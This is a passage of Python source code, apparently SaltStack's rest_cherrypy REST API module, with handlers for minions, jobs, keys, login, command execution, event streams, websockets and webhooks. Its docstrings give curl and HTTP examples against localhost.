:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: http
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: http
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: http
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, jid=None, timeout=''):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: http
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: http
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = [{
'client': 'runner',
'fun': 'jobs.list_job' if jid else 'jobs.list_jobs',
'jid': jid,
}]
cherrypy.request.lowstate = lowstate
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
ret['info'] = [job_ret_info[0]]
minion_ret = {}
returns = job_ret_info[0].get('Result')
for minion in returns.keys():
if u'return' in returns[minion]:
minion_ret[minion] = returns[minion].get(u'return')
else:
minion_ret[minion] = returns[minion].get('return')
ret['return'] = [minion_ret]
else:
ret['return'] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
'''
@cherrypy.config(**{'tools.salt_token.on': True})
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: http
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: http
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
@cherrypy.config(**{'tools.hypermedia_out.on': False, 'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>`.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: http
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
lowstate = cherrypy.request.lowstate
lowstate[0].update({
'client': 'wheel',
'fun': 'key.gen_accept',
})
if 'mid' in lowstate[0]:
lowstate[0]['id_'] = lowstate[0].pop('mid')
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
pub_key = ret.get('pub', '')
pub_key_file = tarfile.TarInfo('minion.pub')
pub_key_file.size = len(pub_key)
priv_key = ret.get('priv', '')
priv_key_file = tarfile.TarInfo('minion.pem')
priv_key_file.size = len(priv_key)
fileobj = six.moves.StringIO()
tarball = tarfile.open(fileobj=fileobj, mode='w')
tarball.addfile(pub_key_file, six.moves.StringIO(pub_key))
tarball.addfile(priv_key_file, six.moves.StringIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(lowstate[0]['id_'])
headers['Content-Type'] = 'application/x-tar'
headers['Content-Length'] = fileobj.len
headers['Cache-Control'] = 'no-cache'
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: http
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning(
'Salt Master is not available.')
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get('username', None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
cherrypy.session['user'] = token['name']
if 'groups' in token:
cherrypy.session['groups'] = token['groups']
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token['name'], [])
perms.extend(eauth.get('*', []))
if 'groups' in token and token['groups']:
user_groups = set(token['groups'])
eauth_groups = set([i.rstrip('%') for i in eauth.keys() if i.endswith('%')])
for group in user_groups & eauth_groups:
perms.extend(eauth['{0}%'.format(group)])
if not perms:
logger.debug("Eauth permission list not found.")
except Exception:
logger.debug("Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'."
.format(token.get('eauth'), token.get('name')), exc_info=True)
perms = None
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms or {},
}]}
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Run(LowDataAdapter):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
salt-api does not enforce authorization, Salt's eauth system does that.
Local/Runner/WheelClient all accept ``username``/``password``/``eauth``
**or** ``token`` kwargs that are then checked by the eauth system. The
session mechanism in ``rest_cherrypy`` simply pairs a session with a Salt
eauth token and then passes the ``token`` kwarg in automatically.
If you already have a Salt eauth token, perhaps generated by the
:py:func:`mk_token <salt.runners.auth.mk_token>` function in the Auth
Runner module, then there is no reason to use sessions.
This endpoint accepts either a ``username``, ``password``, ``eauth`` trio,
**or** a ``token`` kwarg and does not make use of sessions at all.
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>` Other than that this URL is identical to the
:py:meth:`root URL (/) <LowDataAdapter.POST>`.
.. http:post:: /run
An array of :term:`lowstate` data describing Salt commands must be
sent in the request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
**Or** using a Salt Eauth token:
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"token": "<salt eauth token here>"
}]'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run enpoint can also be used to issue commands using the salt-ssh
subsystem.
When using salt-ssh, eauth credentials should not be supplied. Instad,
authentication should be handled by the SSH layer itself. The use of
the salt-ssh client does not require a salt master to be running.
Instead, only a roster file must be present in the salt configuration
directory.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: http
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
'''
return {
'return': list(self.exec_lowstate()),
}
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
'''
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
'''
if auth_token is None:
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get('token', auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: http
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialze the
JSON object each time.
.. code-block:: http
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.log(saltEvent.tag, saltEvent.data);
};
Note, the SSE stream is fast and completely asynchronous and Salt is
very fast. If a job is created using a regular POST request, it is
possible that the job return will be available on the SSE stream before
the response for the POST request arrives. It is important to take that
asynchronity into account when designing an application. Below are some
general guidelines.
* Subscribe to the SSE stream _before_ creating any events.
* Process SSE events directly as they arrive and don't wait for any
other process to "complete" first (like an ajax request).
* Keep a buffer of events if the event stream must be used for
synchronous lookups.
* Be cautious in writing Salt's event stream directly to the DOM. It is
very busy and can quickly overwhelm the memory allocated to a
browser tab.
A full, working proof-of-concept JavaScript appliction is available
:blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
It can be viewed by pointing a browser at the ``/app`` endpoint in a
running ``rest_cherrypy`` instance.
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
cookies = cherrypy.request.cookie
auth_token = token or salt_token or (
cookies['session_id'].value if 'session_id' in cookies else None)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
yield u'retry: {0}\n'.format(400)
while True:
data = next(stream)
yield u'tag: {0}\n'.format(data.get('tag', ''))
yield u'data: {0}\n\n'.format(json.dumps(data))
return listen()
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: http
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
Above examples show how to establish a websocket connection to Salt and
activating real time updates from Salt's event stream by signaling
``websocket client ready``.
'''
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
SaltInfo = event_processor.SaltInfo(handler)
def signal_handler(signal, frame):
os._exit(0)
signal.signal(signal.SIGTERM, signal_handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send('data: {0}\n\n'.format(
json.dumps(data)), False)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}"
.format(data))
time.sleep(0.1)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle async push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_token.on'] = False
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: http
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: yaml
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, 'raw_body', '')
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
# Late import
try:
from cherrypy.lib import cpstats
except ImportError:
logger.error('Import of cherrypy.cpstats failed. Possible '
